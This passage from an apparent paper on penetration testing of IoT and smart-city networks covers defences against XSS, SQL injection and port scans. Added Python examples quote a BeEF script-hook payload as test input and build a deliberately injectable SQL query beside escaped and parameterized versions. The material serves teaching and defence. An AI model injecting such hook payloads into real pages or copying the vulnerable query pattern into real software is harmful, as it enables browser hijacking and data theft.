  iii. Validating User Input: To ensure the web application renders correct data and to stop malicious data from harming it, companies should validate user input. Whitelisting and input validation are standard methods for preventing SQL injection but can also be used for XSS prevention. Whitelisting allows only known-good characters, which is better than blacklisting, which disallows only certain predetermined known-bad characters. Input validation is helpful for form validation, as disallowed characters are prevented from being entered into the field by the user. However, it is not a primary prevention method for XSS; it only helps to reduce the impact should an attacker discover such a vulnerability.
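As an added example that is not the paper's own code, the echo page from the BeEF experiment (Sect. 10) and the escaping and validation controls just described are shown side by side in Python: render_unsafe mimics a page that writes submitted text into its HTML verbatim, render_escaped applies HTML output encoding, and validate_search_term is a hypothetical allow-list for a search field. The page template, function names and allow-list are assumptions, not taken from the paper.

```python
import html
import re

# The BeEF hook tag quoted in Sect. 10, used here only as a test input string
# for the vulnerable and hardened renderers (no hook server is contacted).
HOOK_TAG = '<script src="http://127.0.0.1:3000/hook.js"></script>'

# Hypothetical page template standing in for the XAMPP "echo" page; the
# placeholder {input} is where the submitted text is written into the HTML.
TEMPLATE = (
    '<html><body><form method="post"><textarea name="text"></textarea>'
    '<input type="submit"></form><p>You entered: {input}</p></body></html>'
)


def render_unsafe(user_input: str) -> str:
    """Vulnerable 'echo' page: the submitted text is written into the HTML
    unchanged, so a <script> tag is parsed as markup and executed."""
    return TEMPLATE.format(input=user_input)


def render_escaped(user_input: str) -> str:
    """Hardened page: HTML output encoding (the 'Escaping' control above).
    <, >, &, " and ' become entities, so the browser displays the text
    instead of interpreting it as markup."""
    return TEMPLATE.format(input=html.escape(user_input, quote=True))


# Allow-list for a free-text search term (the 'Validating User Input' control):
# letters, digits, spaces and a few punctuation marks; anything else is rejected.
SEARCH_TERM_RE = re.compile(r"^[A-Za-z0-9 .,_-]{1,64}$")


def validate_search_term(user_input: str) -> bool:
    """True only if the input consists solely of allow-listed characters."""
    return SEARCH_TERM_RE.fullmatch(user_input) is not None


def contains_live_script(rendered_html: str) -> bool:
    """Regression check a test suite can run over rendered pages: does an
    unescaped <script ...> tag appear in the output?"""
    return re.search(r"<script\b", rendered_html, re.IGNORECASE) is not None


if __name__ == "__main__":
    for name, renderer in (("unsafe", render_unsafe), ("escaped", render_escaped)):
        page = renderer(HOOK_TAG)
        print(f"{name:8s} renders a live <script>: {contains_live_script(page)}")
    print("allow-list accepts the hook tag:", validate_search_term(HOOK_TAG))
```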

Ways to prevent SQL Injection:

  • Filter or restrict the special characters accepted as input, sanitize user inputs, and do not build dynamic SQL queries.

  • Use POST methods to pass user input parameters and use stored procedures wherever required.

  i. Trust No One: Companies and users need to assume that all user-submitted data is malicious, so they need to validate user input, for example via a function such as MySQL's mysql_real_escape_string() that prevents dangerous characters such as ' from being passed into a SQL query as data. All user input should be filtered and sanitized; for example, input for an email address field should be filtered to allow only the characters permitted in an email address.

  ii. Prepared Statements (with Parameterized Queries): Companies and users should use prepared statements with parameterized queries: all the SQL code is defined first, and each parameter is passed to the query afterwards. This allows the database to distinguish between code and data regardless of what user input is supplied, so the intent of the query cannot be changed by an attacker even if SQL commands are inserted.

  iii. Firewall: Companies and users should use a software- or hardware-based web application firewall to filter out malicious data. A good web application firewall ships with a comprehensive set of default rules and makes adding new ones easy. One example is the open-source ModSecurity module, available for the Apache, Microsoft IIS and Nginx web servers, which provides a sophisticated rule set to filter potentially dangerous web requests and catches most attempts to sneak SQL through web channels.
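The single-quote probe from the sqlmap experiment (Sect. 11) and the 'Trust No One' and prepared-statement controls above, worked through in Python with an in-memory SQLite database as an added example that is not the paper's or the test site's code. The products table, the search functions and the email allow-list are constructed for illustration.

```python
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for a shop database (not the real site's data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products (name) VALUES ('smart meter'), ('parking sensor'), ('camera');
    """)
    return conn


def search_vulnerable(conn: sqlite3.Connection, test: str) -> list:
    """Dynamic SQL built by string concatenation, like a search.php?test= handler
    that pastes the parameter into the query. A single quote in `test` changes
    the query text itself, so the database raises a syntax error: the tell-tale
    the paper looks for when testing a URL."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + test + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_prepared(conn: sqlite3.Connection, test: str) -> list:
    """Parameterized query: the SQL text is fixed and `test` travels as data,
    so a quote can only ever be part of the search term."""
    sql = "SELECT name FROM products WHERE name LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + test + "%",))]


def quote_probe(search_fn, conn: sqlite3.Connection) -> str:
    """Replays the single-quote test against a search function and classifies
    the outcome: 'error' means the input reached the SQL parser."""
    try:
        search_fn(conn, "'")
        return "ok"
    except sqlite3.Error:
        return "error"


# 'Trust No One': allow-list for an email field, accepting only characters that
# belong in an address, so a quote never reaches the query in the first place.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def validate_email(value: str) -> bool:
    return EMAIL_RE.fullmatch(value) is not None


if __name__ == "__main__":
    print("concatenated query, input ':", quote_probe(search_vulnerable, make_db()))
    print("prepared query, input '    :", quote_probe(search_prepared, make_db()))
    print("prepared query, 'sensor'   :", search_prepared(make_db(), "sensor"))
    print("email allow-list, o'neil@x.org:", validate_email("o'neil@x.org"))
```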

A port scan cannot be stopped outright, since scanning ports is not the same as connecting to systems; a port scan is not in itself an intrusion and could even be a valid communication attempt. However, companies and users should monitor the traffic flowing over the network and watch for incoming traffic from the same source to the same destination across many different port numbers. Once such a source has been identified, the firewall should block the source IP address, and rules should be implemented that deny traffic from harmful or unknown origins.

15 Conclusion

The world of IT expands quickly and gives humanity many advantages and flexibilities, but also the reverse: a growing number of risks and weaknesses that pose a massive risk to every sector and inflict large losses on businesses and societies. Therefore, penetration testing should be performed on IoT and smart city networks to inspect systems, networks and applications for vulnerabilities, using free tools or professionals depending on the infrastructure and resources available, before they are hacked. Attacks are often related to SQL injection, spamming and cross-site scripting, so the responsible bodies and organizations should monitor their network traffic, block unknown or suspicious data and ports, and keep workers and clients briefly informed. Kali is one of the best free toolkits, offering users many possibilities for in-depth testing. A proactive approach to information security is required in the modern world to prevent possible security breaches. It is also very important to assess one's own system vulnerabilities and loopholes before hackers find them and use them to compromise the website or network, because a security breach and the resulting data loss cost a huge amount of money and damage business credibility as well. Consequently, it is worthwhile for businesses to spend heavily on securing their valuable assets. Indeed, the assessment of a vulnerability management system rests on the following fundamental elements: defining the degree of vulnerability, using information from assessment tools or software to estimate the potential loss or exploit level, analysing data sensitivity, and paying more attention to sensitive information assets such as a credit card database. Concerning confidentiality, three levels of information may be distinguished: public, internal and highly sensitive. Existing controls and policies should be scrutinised on a timely basis, and it should be standard practice to keep upgrading them and to monitor the health of existing controls and their resistance to the latest attacks.

In response, industry insiders and prospective city developers agree that certain protection concerns need to be resolved. Unlike the typical protection concerns of the past, the data security standards of intelligent cities are modern and continually evolving around emerging technologies and creative developments. Security specialists would be well advised to look at some of the strategies already presented in order to recognize the risky environment that might plague smart cities in the future.